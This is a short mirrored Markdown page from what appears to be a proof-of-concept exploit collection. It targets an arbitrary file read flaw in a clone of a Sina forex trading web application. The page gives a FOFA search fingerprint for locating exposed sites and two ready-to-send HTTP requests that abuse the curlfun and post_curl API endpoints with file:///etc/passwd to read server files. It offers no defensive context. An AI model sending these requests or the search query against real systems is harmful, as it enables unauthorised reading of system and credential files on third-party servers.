mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
23 lines
526 B
Markdown
23 lines
526 B
Markdown
## 仿新浪外汇余额宝时间交易所任意文件读取
|
|
|
|

|
|
|
|
## fofa
|
|
|
|
```
|
|
"/static/index/css/ionic.css" && "devework.com"
|
|
```
|
|
|
|
## poc
|
|
|
|
```
|
|
GET /index.php/index/Api/curlfun?url=file:///etc/passwd HTTP/1.1
|
|
Host:
|
|
```
|
|
|
|
```
|
|
GET /index.php/index/Api/post_curl?url=file:///etc/passwd&data=1 HTTP/1.1
|
|
Host:
|
|
```
|
|
|
|
 |